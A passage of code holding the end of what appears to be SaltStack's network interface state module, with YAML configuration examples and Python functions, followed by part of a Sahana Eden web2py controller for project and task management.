- 8.8.4.4
eth0-range0:
network.managed:
- type: eth
- ipaddr_start: 192.168.1.1
- ipaddr_end: 192.168.1.10
- clonenum_start: 10
- mtu: 9000
bond0-range0:
network.managed:
- type: eth
- ipaddr_start: 192.168.1.1
- ipaddr_end: 192.168.1.10
- clonenum_start: 10
- mtu: 9000
eth1.0-range0:
network.managed:
- type: eth
- ipaddr_start: 192.168.1.1
- ipaddr_end: 192.168.1.10
- clonenum_start: 10
- vlan: True
- mtu: 9000
bond0.1-range0:
network.managed:
- type: eth
- ipaddr_start: 192.168.1.1
- ipaddr_end: 192.168.1.10
- clonenum_start: 10
- vlan: True
- mtu: 9000
.. note::
add support of ranged interfaces (vlan, bond and eth) for redhat system,
Important:type must be eth.
routes:
network.routes:
- name: eth0
- routes:
- name: secure_network
ipaddr: 10.2.0.0
netmask: 255.255.255.0
gateway: 10.1.0.3
- name: HQ_network
ipaddr: 10.100.0.0
netmask: 255.255.0.0
gateway: 10.1.0.10
eth2:
network.managed:
- enabled: True
- type: slave
- master: bond0
eth3:
network.managed:
- enabled: True
- type: slave
- master: bond0
eth4:
network.managed:
- enabled: True
- type: eth
- proto: dhcp
- bridge: br0
eth5:
network.managed:
- enabled: True
- type: eth
- proto: dhcp
- noifupdown: True # Do not restart the interface
# you need to reboot/reconfigure manualy
bond0:
network.managed:
- type: bond
- ipaddr: 10.1.0.1
- netmask: 255.255.255.0
- mode: active-backup
- proto: static
- dns:
- 8.8.8.8
- 8.8.4.4
- ipv6:
- enabled: False
- slaves: eth2 eth3
- require:
- network: eth2
- network: eth3
- miimon: 100
- arp_interval: 250
- downdelay: 200
- lacp_rate: fast
- max_bonds: 1
- updelay: 0
- use_carrier: on
- xmit_hash_policy: layer2
- mtu: 9000
- autoneg: on
- speed: 1000
- duplex: full
- rx: on
- tx: off
- sg: on
- tso: off
- ufo: off
- gso: off
- gro: off
- lro: off
bond0.2:
network.managed:
- type: vlan
- ipaddr: 10.1.0.2
- use:
- network: bond0
- require:
- network: bond0
bond0.3:
network.managed:
- type: vlan
- ipaddr: 10.1.0.3
- use:
- network: bond0
- require:
- network: bond0
bond0.10:
network.managed:
- type: vlan
- ipaddr: 10.1.0.4
- use:
- network: bond0
- require:
- network: bond0
bond0.12:
network.managed:
- type: vlan
- ipaddr: 10.1.0.5
- use:
- network: bond0
- require:
- network: bond0
br0:
network.managed:
- enabled: True
- type: bridge
- proto: dhcp
- bridge: br0
- delay: 0
- ports: eth4
- bypassfirewall: True
- use:
- network: eth4
- require:
- network: eth4
system:
network.system:
- enabled: True
- hostname: server1.example.com
- gateway: 192.168.0.1
- gatewaydev: eth0
- nozeroconf: True
- nisdomain: example.com
- require_reboot: True
- apply_hostname: True
lo:
network.managed:
- name: lo
- type: eth
- onboot: yes
- userctl: no
- ipv6_autoconf: no
- enable_ipv6: true
- ipaddrs:
- 127.0.0.1/8
- 10.1.0.4/32
- 10.1.0.12/32
- ipv6addrs:
- fc00::1/128
- fc00::100/128
.. note::
Apply changes to hostname immediately.
.. versionadded:: 2015.5.0
.. note::
When managing bridged interfaces on a Debian or Ubuntu based system, the
ports argument is required. Red Hat systems will ignore the argument.
'''
from __future__ import absolute_import
# Import python libs
import difflib
import salt.utils
import salt.utils.network
import salt.loader
# Set up logging
import logging
log = logging.getLogger(__name__)
def __virtual__():
'''
Confine this module to non-Windows systems with the required execution
module available.
'''
if not salt.utils.is_windows() and 'ip.get_interface' in __salt__:
return True
return False
def managed(name, type, enabled=True, **kwargs):
'''
Ensure that the named interface is configured properly.
name
The name of the interface to manage
type
Type of interface and configuration.
enabled
Designates the state of this interface.
kwargs
The IP parameters for this interface.
'''
# For this function we are purposefully overwriting a bif
# to enhance the user experience. This does not look like
# it will cause a problem. Just giving a heads up in case
# it does create a problem.
ret = {
'name': name,
'changes': {},
'result': True,
'comment': 'Interface {0} is up to date.'.format(name),
}
if 'test' not in kwargs:
kwargs['test'] = __opts__.get('test', False)
# set ranged status
apply_ranged_setting = False
# Build interface
try:
old = __salt__['ip.get_interface'](name)
new = __salt__['ip.build_interface'](name, type, enabled, **kwargs)
if kwargs['test']:
if old == new:
pass
if not old and new:
ret['result'] = None
ret['comment'] = 'Interface {0} is set to be ' \
'added.'.format(name)
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['result'] = None
ret['comment'] = 'Interface {0} is set to be ' \
'updated:\n{1}'.format(name, '\n'.join(diff))
else:
if not old and new:
ret['comment'] = 'Interface {0} ' \
'added.'.format(name)
ret['changes']['interface'] = 'Added network interface.'
apply_ranged_setting = True
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['comment'] = 'Interface {0} ' \
'updated.'.format(name)
ret['changes']['interface'] = '\n'.join(diff)
apply_ranged_setting = True
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
# Debian based system can have a type of source
# in the interfaces file, we don't ifup or ifdown it
if type == 'source':
return ret
# Setup up bond modprobe script if required
if type == 'bond':
try:
old = __salt__['ip.get_bond'](name)
new = __salt__['ip.build_bond'](name, **kwargs)
if kwargs['test']:
if not old and new:
ret['result'] = None
ret['comment'] = 'Bond interface {0} is set to be ' \
'added.'.format(name)
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['result'] = None
ret['comment'] = 'Bond interface {0} is set to be ' \
'updated:\n{1}'.format(name, '\n'.join(diff))
else:
if not old and new:
ret['comment'] = 'Bond interface {0} ' \
'added.'.format(name)
ret['changes']['bond'] = 'Added bond {0}.'.format(name)
apply_ranged_setting = True
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['comment'] = 'Bond interface {0} ' \
'updated.'.format(name)
ret['changes']['bond'] = '\n'.join(diff)
apply_ranged_setting = True
except AttributeError as error:
#TODO Add a way of reversing the interface changes.
ret['result'] = False
ret['comment'] = str(error)
return ret
if kwargs['test']:
return ret
# For Redhat/Centos ranged network
if "range" in name:
if apply_ranged_setting:
try:
ret['result'] = __salt__['service.restart']('network')
ret['comment'] = "network restarted for change of ranged interfaces"
return ret
except Exception as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
ret['result'] = True
ret['comment'] = "no change, passing it"
return ret
# Bring up/shutdown interface
try:
# Get Interface current status
interfaces = salt.utils.network.interfaces()
interface_status = False
if name in interfaces:
interface_status = interfaces[name].get('up')
else:
for iface in interfaces:
if 'secondary' in interfaces[iface]:
for second in interfaces[iface]['secondary']:
if second.get('label', '') == 'name':
interface_status = True
if enabled:
if 'noifupdown' not in kwargs:
if interface_status:
if ret['changes']:
# Interface should restart to validate if it's up
__salt__['ip.down'](name, type)
__salt__['ip.up'](name, type)
ret['changes']['status'] = 'Interface {0} restart to validate'.format(name)
return ret
else:
__salt__['ip.up'](name, type)
ret['changes']['status'] = 'Interface {0} is up'.format(name)
else:
if 'noifupdown' not in kwargs:
if interface_status:
__salt__['ip.down'](name, type)
ret['changes']['status'] = 'Interface {0} down'.format(name)
except Exception as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
# TODO: create saltutil.refresh_grains that fires events to the minion daemon
grains_info = salt.loader.grains(__opts__, True)
__grains__.update(grains_info)
__salt__['saltutil.refresh_modules']()
return ret
def routes(name, **kwargs):
'''
Manage network interface static routes.
name
Interface name to apply the route to.
kwargs
Named routes
'''
ret = {
'name': name,
'changes': {},
'result': True,
'comment': 'Interface {0} routes are up to date.'.format(name),
}
apply_routes = False
if 'test' not in kwargs:
kwargs['test'] = __opts__.get('test', False)
# Build interface routes
try:
old = __salt__['ip.get_routes'](name)
new = __salt__['ip.build_routes'](name, **kwargs)
if kwargs['test']:
if old == new:
return ret
if not old and new:
ret['result'] = None
ret['comment'] = 'Interface {0} routes are set to be added.'.format(name)
return ret
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['result'] = None
ret['comment'] = 'Interface {0} routes are set to be ' \
'updated:\n{1}'.format(name, '\n'.join(diff))
return ret
if not old and new:
apply_routes = True
ret['comment'] = 'Interface {0} routes added.'.format(name)
ret['changes']['network_routes'] = 'Added interface {0} routes.'.format(name)
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
apply_routes = True
ret['comment'] = 'Interface {0} routes updated.'.format(name)
ret['changes']['network_routes'] = '\n'.join(diff)
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
# Apply interface routes
if apply_routes:
try:
__salt__['ip.apply_network_settings'](**kwargs)
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
return ret
def system(name, **kwargs):
'''
Ensure that global network settings are configured properly.
name
Custom name to represent this configuration change.
kwargs
The global parameters for the system.
'''
ret = {
'name': name,
'changes': {},
'result': True,
'comment': 'Global network settings are up to date.',
}
apply_net_settings = False
kwargs['test'] = __opts__['test']
# Build global network settings
try:
old = __salt__['ip.get_network_settings']()
new = __salt__['ip.build_network_settings'](**kwargs)
if __opts__['test']:
if old == new:
return ret
if not old and new:
ret['result'] = None
ret['comment'] = 'Global network settings are set to be added.'
return ret
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['result'] = None
ret['comment'] = 'Global network settings are set to be ' \
'updated:\n{0}'.format('\n'.join(diff))
return ret
if not old and new:
apply_net_settings = True
ret['changes']['network_settings'] = 'Added global network settings.'
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
apply_net_settings = True
ret['changes']['network_settings'] = '\n'.join(diff)
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
# Apply global network settings
if apply_net_settings:
try:
__salt__['ip.apply_network_settings'](**kwargs)
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
return ret
|
|
# -*- coding: utf-8 -*-
"""
Project Tracking & Management
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
mode_task = settings.get_project_mode_task()
# =============================================================================
def index():
""" Module's Home Page """
if mode_task:
# Bypass home page & go direct to browsing Tasks for a Project
s3_redirect_default(URL(f="project", vars={"tasks":1}))
else:
# Bypass home page & go direct to filterable list of Projects
s3_redirect_default(URL(f="project"))
# =============================================================================
def create():
""" Redirect to project/create """
redirect(URL(f="project", args="create"))
# -----------------------------------------------------------------------------
def project():
""" RESTful CRUD controller """
if "tasks" in get_vars:
# Open-Tasks-For-Project Selector
return open_tasks_for_project()
# Pre-process
def prep(r):
# Location Filter
s3db.gis_location_filter(r)
component = r.component
component_name = component.name if component else None
hr_group = r.get_vars.get("group")
if r.method == "datalist":
# Set list_fields for renderer (project_project_list_layout)
s3db.configure("project_project",
list_fields = ["name",
"description",
"location.location_id",
"start_date",
"organisation_id",
"organisation_id$logo",
"modified_by",
]
)
# Filter human resource records if "group" in get_vars
elif component_name == "human_resource":
type_field = FS("human_resource.type")
if hr_group == "staff":
query = (type_field == 1)
elif hr_group == "volunteer":
query = (type_field == 2)
else:
query = None
if query:
r.resource.add_component_filter("human_resource", query)
if r.interactive:
htable = s3db.table("hrm_human_resource")
if htable:
htable.person_id.comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Person"),
T("Select the person assigned to this role for this project."),
)
)
if not component:
# Filter Themes based on Sector
if r.record:
table = s3db.project_sector_project
query = (table.project_id == r.id) & \
(table.deleted == False)
rows = db(query).select(table.sector_id)
sector_ids = [row.sector_id for row in rows]
set_theme_requires(sector_ids)
if r.method in ("create", "update"):
# Context from a Profile page?"
location_id = get_vars.get("(location)", None)
if location_id:
field = s3db.project_location.location_id
field.default = location_id
field.readable = field.writable = False
organisation_id = get_vars.get("(organisation)", None)
if organisation_id:
field = r.table.organisation_id
field.default = organisation_id
field.readable = field.writable = False
elif r.method == "details":
# Until we can automate this inside s3profile
# - remove the fkey from the list_fields
configure = s3db.configure
get_config = s3db.get_config
define_resource = s3db.resource
for tablename in ("project_organisation",
"project_location",
"project_beneficiary",
"project_human_resource_project",
):
s3db.table(tablename)
list_fields = get_config(tablename, "list_fields")
if not list_fields:
list_fields = define_resource(tablename).list_fields()
try:
list_fields.remove("project_id")
except:
# Already removed
pass
configure(tablename, list_fields=list_fields)
if r.id:
r.table.human_resource_id.represent = \
s3db.hrm_HumanResourceRepresent(show_link=True)
elif r.get_vars.get("project.status_id", None):
stable = s3db.project_status
status = get_vars.get("project.status_id")
row = db(stable.name == status).select(stable.id,
limitby=(0, 1)).first()
if row:
r.table.status_id.default = row.id
r.table.status_id.writable = False
elif component_name == "organisation":
if r.method != "update":
allowed_roles = dict(settings.get_project_organisation_roles())
if settings.get_template() == "DRRPP":
# Partner NS should only come via sync from RMS
# @ToDo: Move to Template customise
allowed_roles.pop(9, None)
lead_role = 1
otable = s3db.project_organisation
query = (otable.project_id == r.id) & \
(otable.role == lead_role) & \
(otable.deleted != True)
row = db(query).select(otable.id,
limitby=(0, 1)).first()
if row:
# Project has already a lead organisation
# => exclude lead_role in component add-form
allowed_roles.pop(lead_role, None)
otable.role.requires = IS_EMPTY_OR(IS_IN_SET(allowed_roles))
elif component_name == "activity":
# Filter Activity Types/Themes based on Sector
table = s3db.project_sector_project
query = (table.project_id == r.id) & \
(table.deleted == False)
rows = db(query).select(table.sector_id)
sector_ids = [row.sector_id for row in rows]
set_activity_type_requires("project_activity_activity_type", sector_ids)
set_theme_requires(sector_ids)
elif component_name == "goal":
# Not working for embedded create form
#if r.method == "create":
if r.method != "update":
ctable = r.component.table
field = ctable.weighting
field.readable = field.writable = False
ctable.current_status.readable = False
ctable.overall_status.readable = False
elif component_name == "outcome":
if r.method != "update":
ctable = r.component.table
field = ctable.weighting
field.readable = field.writable = False
ctable.current_status.readable = False
ctable.overall_status.readable = False
if settings.get_project_goals():
# Filter to just those for this Project & make mandatory
r.component.table.goal_id.requires = IS_ONE_OF(db, "project_goal.id",
s3db.project_goal_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif component_name == "output":
if r.method != "update":
ctable = r.component.table
field = ctable.weighting
field.readable = field.writable = False
ctable.current_status.readable = False
ctable.overall_status.readable = False
if settings.get_project_outcomes():
# Filter to just those for this Project & make mandatory
r.component.table.outcome_id.requires = IS_ONE_OF(db, "project_outcome.id",
s3db.project_outcome_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif settings.get_project_goals():
# Filter to just those for this Project & make mandatory
r.component.table.goal_id.requires = IS_ONE_OF(db, "project_goal.id",
s3db.project_goal_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif component_name == "indicator":
if r.method != "update":
ctable = r.component.table
field = ctable.weighting
field.readable = field.writable = False
ctable.current_status.readable = False
ctable.overall_status.readable = False
if settings.get_project_outputs():
# Filter to just those for this Project & make mandatory
r.component.table.output_id.requires = IS_ONE_OF(db, "project_output.id",
s3db.project_output_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif settings.get_project_outcomes():
# Filter to just those for this Project & make mandatory
r.component.table.outcome_id.requires = IS_ONE_OF(db, "project_outcome.id",
s3db.project_outcome_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif settings.get_project_goals():
# Filter to just those for this Project & make mandatory
r.component.table.goal_id.requires = IS_ONE_OF(db, "project_goal.id",
s3db.project_goal_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif component_name == "indicator_data":
ctable = r.component.table
# Filter to just those for this Project & make mandatory
ctable.indicator_id.requires = IS_ONE_OF(db, "project_indicator.id",
s3db.project_indicator_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
# @ToDo: end_date cannot be before Project Start
#ctable.end_date.requires =
# Have a filter for indicator in indicator data report
#if r.method == "report":
# from s3 import S3OptionsFilter
# filter_widgets = [S3OptionsFilter("indicator_id",
# label = T("Indicator"),
# ),
# ]
#else:
# filter_widgets = None
#r.component.configure(filter_widgets = filter_widgets)
elif component_name == "task":
if not auth.s3_has_role("STAFF"):
# Hide fields which are meant for staff members
# (avoid confusion both of inputters & recipients)
unwanted_fields = ["source",
"pe_id",
"date_due",
"time_estimated",
"time_actual",
"status",
]
ttable = component.table
for fieldname in unwanted_fields:
field = ttable[fieldname]
field.readable = field.writable = False
if "open" in r.get_vars:
# Show only the Open Tasks for this Project (unused?)
statuses = s3.project_task_active_statuses
query = FS("status").belongs(statuses)
r.resource.add_component_filter("task", query)
# Filter activities and milestones to the current project
options_filter = {"filterby": "project_id",
"filter_opts": (r.id,),
}
fields = []
if settings.get_project_activities():
fields.append(s3db.project_task_activity.activity_id)
if settings.get_project_milestones():
fields.append(s3db.project_task_milestone.milestone_id)
for f in fields:
requires = f.requires
if isinstance(requires, IS_EMPTY_OR):
requires = requires.other
if hasattr(requires, "set_filter"):
requires.set_filter(**options_filter)
elif component_name == "beneficiary":
# Filter the location selector to the project's locations
component.table.project_location_id.requires = \
IS_EMPTY_OR(IS_ONE_OF(db, "project_location.id",
s3db.project_location_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
)
elif component_name in ("human_resource", "human_resource_project"):
htable = s3db.hrm_human_resource
htable.person_id.represent = \
s3db.pr_PersonRepresent(show_link=True)
# These values are defined in hrm_type_opts
human_resource_id = r.table.human_resource_id
filter_opts = None
if hr_group:
crud_strings = s3.crud_strings
if hr_group == "staff":
filter_opts = (1,)
human_resource_id.label = T("Staff")
crud_strings["project_human_resource_project"] = crud_strings["hrm_staff"]
elif hr_group == "volunteer":
filter_opts = (2,)
human_resource_id.label = T("Volunteer")
crud_strings["project_human_resource_project"] = crud_strings["hrm_volunteer"]
if filter_opts:
# Use the group to filter the form widget when
# adding a new record
human_resource_id.requires = \
IS_ONE_OF(db, "hrm_human_resource.id",
s3db.hrm_human_resource_represent,
filterby="type",
filter_opts=filter_opts,
orderby="hrm_human_resource.person_id",
sort=True
)
# @ToDo:
#if settings.has_module("budget"):
# from s3 import S3SQLCustomForm, S3SQLInlineComponent
# field = s3db.budget_allocation.budget_entity_id
# field.readable = field.writable = True
# field.requires = S3Represent(lookup="budget_budget", key="budget_entity_id")
# field.requires = IS_ONE_OF()
#
# crud_form = S3SQLCustomForm("project_id",
# "human_resource_id",
# "status",
# S3SQLInlineComponent("allocation",
# label = T("Budget"),
# fields = ["budget_entity_id",
# "start_date",
# "end_date",
# "daily_cost",
# ],
# ),
# )
# s3db.configure("project_human_resoruce_project",
# crud_form = crud_form,
# list_fields = [#"project_id", # Not being dropped in component view
# "human_resource_id",
# "status",
# "allocation.budget_entity_id",
# "allocation.start_date",
# "allocation.end_date",
# "allocation.daily_cost",
# ],
elif component_name == "document":
# Hide unnecessary fields
dtable = component.table
dtable.organisation_id.readable = \
dtable.organisation_id.writable = False
dtable.person_id.readable = \
dtable.person_id.writable = False
dtable.location_id.readable = \
dtable.location_id.writable = False
return True
s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive:
component_name = r.component_name
if not r.component:
if mode_task:
read_url = URL(args=["[id]", "task"])
update_url = URL(args=["[id]", "task"])
s3_action_buttons(r,
read_url=read_url,
update_url=update_url)
#elif component_name == "indicator":
# # Open should open the profile page
# read_url = URL(f="indicator",
# args=["[id]", "profile"])
# update_url = URL(f="indicator",
# args=["[id]", "profile"])
# s3_action_buttons(r,
# read_url=read_url,
# update_url=update_url)
elif component_name == "task" and r.component_id:
# Put Comments in rfooter
s3db.project_ckeditor()
s3.rfooter = LOAD("project", "comments.load",
args=[r.component_id],
ajax=True)
return output
s3.postp = postp
return s3_rest_controller(module, "project",
csv_template = "project",
hide_filter = {None: False,
#"indicator_data": False,
"_default": True,
},
rheader = s3db.project_rheader,
)
# -----------------------------------------------------------------------------
def open_tasks_for_project():
"""
Simplified controller to select a project and open the
list of open tasks for it
"""
def prep(r):
tablename = "project_project"
s3.crud_strings[tablename].title_list = T("Open Tasks for Project")
s3.crud_labels.READ = s3.crud_labels.UPDATE = T("Select")
s3db.configure(tablename,
deletable=False,
listadd=False,
)
return True
s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive and not r.component:
tasklist_url = URL(f="task", vars={"project":"[id]"})
s3_action_buttons(r,
deletable=False,
read_url=tasklist_url,
update_url=tasklist_url)
return output
s3.postp = postp
return s3_rest_controller(module, "project",
hide_filter=False,
)
# -----------------------------------------------------------------------------
def set_theme_requires(sector_ids):
"""
Filters the theme_id based on the sector_id
"""
ttable = s3db.project_theme
tstable = s3db.project_theme_sector
# All themes linked to the project's sectors or to no sectors
rows = db().select(ttable.id,
tstable.sector_id,
left=tstable.on(ttable.id == tstable.theme_id))
sector_ids = sector_ids or []
theme_ids = [row.project_theme.id for row in rows
if not row.project_theme_sector.sector_id or
row.project_theme_sector.sector_id in sector_ids]
table = s3db.project_theme_project
field = table.theme_id
field.requires = IS_EMPTY_OR(IS_ONE_OF(db, "project_theme.id",
field.represent,
filterby="id",
filter_opts=theme_ids,
sort=True,
)
)
# -----------------------------------------------------------------------------
def set_activity_type_requires(tablename, sector_ids):
"""
Filters the activity_type_id based on the sector_id
"""
attable = s3db.project_activity_type
if sector_ids:
atstable = s3db.project_activity_type_sector
# All activity_types linked to the projects sectors or to no sectors
rows = db().select(attable.id,
atstable.sector_id,
left=atstable.on(attable.id == atstable.activity_type_id))
activity_type_ids = [row.project_activity_type.id for row in rows
if not row.project_activity_type_sector.sector_id or
row.project_activity_type_sector.sector_id in sector_ids]
else:
activity_type_ids = []
s3db[tablename].activity_type_id.requires = IS_EMPTY_OR(
IS_ONE_OF(db, "project_activity_type.id",
s3base.S3Represent(lookup="project_activity_type"),
filterby="id",
filter_opts=activity_type_ids,
sort=True,
)
)
# =============================================================================
def sector():
""" RESTful CRUD controller """
return s3_rest_controller("org", "sector")
# -----------------------------------------------------------------------------
def status():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def theme():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def theme_project():
"""
RESTful CRUD controller
- not normally exposed to users via a menu
"""
return s3_rest_controller()
# -----------------------------------------------------------------------------
def theme_sector():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def hazard():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def framework():
""" RESTful CRUD controller """
return s3_rest_controller(dtargs={"dt_text_maximum_len": 160},
hide_filter=True,
)
# =============================================================================
def organisation():
""" RESTful CRUD controller """
if settings.get_project_multiple_organisations():
# e.g. IFRC
s3db.configure("project_organisation",
deletable = False,
editable = False,
insertable = False,
)
#list_btn = A(T("Funding Report"),
# _href=URL(c="project", f="organisation",
# args="report", vars=get_vars),
# _class="action-btn")
return s3_rest_controller(#list_btn=list_btn,
)
else:
# e.g. DRRPP
tabs = [(T("Basic Details"), None),
(T("Projects"), "project"),
(T("Contacts"), "human_resource"),
]
rheader = lambda r: s3db.org_rheader(r, tabs)
return s3_rest_controller("org", resourcename,
rheader = rheader,
)
# =============================================================================
def beneficiary_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def beneficiary():
""" RESTful CRUD controller """
# Normally only used in Report
# - make changes as component of Project
s3db.configure("project_beneficiary",
deletable = False,
editable = False,
insertable = False,
)
list_btn = A(T("Beneficiary Report"),
_href=URL(c="project", f="beneficiary",
args="report", vars=get_vars),
_class="action-btn")
#def prep(r):
# if r.method in ("create", "create.popup", "update", "update.popup"):
# # Coming from Profile page?
# location_id = r.get_vars.get("~.(location)", None)
# if location_id:
# field = r.table.location_id
# field.default = location_id
# field.readable = field.writable = False
# if r.record:
# field = r.table.location_id
# field.comment = None
# field.writable = False
# return True
#s3.prep = prep
return s3_rest_controller(hide_filter=False)
# =============================================================================
def activity_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def activity_type_sector():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def activity_organisation():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def activity():
""" RESTful CRUD controller """
table = s3db.project_activity
if "project_id" in get_vars:
field = table.project_id
field.default = get_vars.project_id
field.writable = False
field.comment = None
# Pre-process
def prep(r):
if r.interactive:
if r.component is not None:
if r.component_name == "document":
doc_table = s3db.doc_document
doc_table.organisation_id.readable = doc_table.organisation_id.writable = False
doc_table.person_id.readable = doc_table.person_id.writable = False
doc_table.location_id.readable = doc_table.location_id.writable = False
return True
s3.prep = prep
return s3_rest_controller(csv_template = "activity",
hide_filter = False,
rheader = s3db.project_rheader,
)
# -----------------------------------------------------------------------------
def location():
""" RESTful CRUD controller """
table = s3db.project_location
# Pre-process
def prep(r):
if r.interactive:
if r.record:
table = s3db.project_sector_project
query = (table.project_id == r.record.project_id) & \
(table.deleted == False)
rows = db(query).select(table.sector_id)
sector_ids = [row.sector_id for row in rows]
else:
sector_ids = []
set_activity_type_requires("project_activity_type_location", sector_ids)
if r.component_name == "document":
table = db.doc_document
table.organisation_id.readable = table.organisation_id.writable = False
table.person_id.readable = table.person_id.writable = False
table.location_id.readable = table.location_id.writable = False
return True
s3.prep = prep
# Pre-process
def postp(r, output):
if r.representation == "plain":
# Replace the Map Popup contents with custom content
item = TABLE()
if settings.get_project_community():
# The Community is the primary resource
record = r.record
table.id.readable = False
table.location_id.readable = False
fields = [table[f] for f in table.fields if table[f].readable]
for field in fields:
data = record[field]
if data:
represent = field.represent
if represent:
item.append(TR(TD(field.label),
TD(represent(data))))
else:
item.append(TR(TD(field.label), TD(data)))
hierarchy = gis.get_location_hierarchy()
gtable = s3db.gis_location
location = db(gtable.id == record.location_id).select(gtable.L1,
gtable.L2,
gtable.L3,
gtable.L4,
).first()
if location:
for field in ["L4", "L3", "L2", "L1"]:
if field in hierarchy and location[field]:
item.append(TR(TD(hierarchy[field]),
TD(location[field])))
output["item"] = item
else:
# The Project is the primary resource
project_id = r.record.project_id
ptable = s3db.project_project
query = (ptable.id == project_id)
project = db(query).select(limitby=(0, 1)).first()
ptable.id.readable = False
fields = [ptable[f] for f in ptable.fields if ptable[f].readable]
for field in fields:
if field == "currency":
# Don't display Currency if no Budget
if not project["budget"]:
continue
data = project[field]
if data:
represent = field.represent
if represent:
item.append(TR(TD(field.label),
TD(represent(data))))
else:
item.append(TR(TD(field.label), TD(data)))
title = s3.crud_strings["project_project"].title_display
# Assume authorised to see details
popup_url = URL(f="project", args=[project_id])
details_btn = A(T("Open"),
_href=popup_url,
_class="btn",
_id="details-btn",
_target="_blank")
output = dict(item = item,
title = title,
details_btn = details_btn,
)
return output
s3.postp = postp
return s3_rest_controller(interactive_report = True,
rheader = s3db.project_rheader,
hide_filter = False,
csv_template = "location",
)
# -----------------------------------------------------------------------------
def demographic():
""" RESTful CRUD controller """
return s3_rest_controller("stats", "demographic")
# -----------------------------------------------------------------------------
def demographic_data():
""" RESTful CRUD controller """
return s3db.stats_demographic_data_controller()
# -----------------------------------------------------------------------------
def location_contact():
""" RESTful CRUD controller for Community Contacts """
return s3_rest_controller(hide_filter=False)
# -----------------------------------------------------------------------------
def report():
"""
RESTful CRUD controller
@ToDo: Why is this needed? To have no rheader?
"""
return s3_rest_controller(module, "activity")
# -----------------------------------------------------------------------------
def partners():
"""
RESTful CRUD controller for Organisations filtered by Type
"""
# @ToDo: This could need to be a deployment setting
get_vars["organisation_type.name"] = \
"Academic,Bilateral,Government,Intergovernmental,NGO,UN agency"
# Load model
table = s3db.org_organisation
# Type is Mandatory (otherwise they can disappear from view)
# @ToDo: How to achieve this in an S3SQLInlineLink?
# Modify CRUD Strings
s3.crud_strings.org_organisation = Storage(
label_create = T("Create Partner Organization"),
title_display = T("Partner Organization Details"),
title_list = T("Partner Organizations"),
title_update = T("Edit Partner Organization"),
title_upload = T("Import Partner Organizations"),
label_list_button = T("List Partner Organizations"),
label_delete_button = T("Delete Partner Organization"),
msg_record_created = T("Partner Organization added"),
msg_record_modified = T("Partner Organization updated"),
msg_record_deleted = T("Partner Organization deleted"),
msg_list_empty = T("No Partner Organizations currently registered")
)
return s3db.org_organisation_controller()
# =============================================================================
def task():
""" RESTful CRUD controller """
return s3db.project_task_controller()
# =============================================================================
def task_project():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def task_activity():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def task_milestone():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def task_tag():
""" RESTful CRUD controller for options.s3json lookups """
# Pre-process
def prep(r):
if r.method != "options" or r.representation != "s3json":
return False
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def role():
""" RESTful CRUD controller """
return s3_rest_controller()
# =============================================================================
def member():
""" RESTful CRUD Controller """
return s3_rest_controller()
# =============================================================================
def milestone():
""" RESTful CRUD controller """
if "project_id" in get_vars:
field = s3db.project_milestone.project_id
field.default = get_vars.project_id
field.writable = False
field.comment = None
return s3_rest_controller()
# =============================================================================
def tag():
""" RESTful CRUD controller """
return s3_rest_controller()
# =============================================================================
def time():
""" RESTful CRUD controller """
# Load model to get normal CRUD strings
table = s3db.project_time
hide_filter = False
if "mine" in get_vars:
